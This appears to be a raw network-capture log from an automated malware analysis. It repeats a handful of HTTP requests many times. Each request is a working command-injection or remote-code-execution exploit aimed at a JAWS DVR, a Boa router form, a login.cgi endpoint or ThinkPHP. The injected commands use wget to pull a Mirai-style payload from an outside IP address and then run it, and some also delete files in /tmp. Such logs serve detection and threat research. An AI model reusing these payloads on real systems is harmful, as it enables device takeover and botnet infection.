Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
